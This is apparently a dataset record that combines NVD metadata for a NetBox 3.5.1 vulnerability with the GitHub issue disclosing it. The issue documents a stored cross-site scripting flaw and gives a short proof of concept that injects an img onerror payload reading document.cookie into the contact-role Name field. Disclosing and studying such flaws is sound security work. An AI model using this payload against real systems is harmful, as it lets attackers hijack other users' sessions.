"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/15"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/anhdq201/netbox/issues/15"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anhdq201/netbox/issues/15 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"anhdq201",
"netbox"
] | # Version: 3.5.1
# Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Contacts" function in the "Organization" feature.
# Proof of Concept
**Step 1:** Go to `/tenancy/contact-roles/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" field.
---

---
**Step 2:** Go to `/tenancy/contact-assignments/`, Select one element and click "Edit Selected", after select "Role"
---


---
**Step 3: Script excuted
---

---
# Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. | Stored Cross Site Scripting Vulnerability in "Create Contact Roles" function in Netbox 3.5.1 | https://api.github.com/repos/anhdq201/netbox/issues/15/comments | 0 | 2023-05-18T16:44:45Z | 2023-05-18T16:44:45Z | https://github.com/anhdq201/netbox/issues/15 | 1,715,942,924 | 15 | 5,189 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.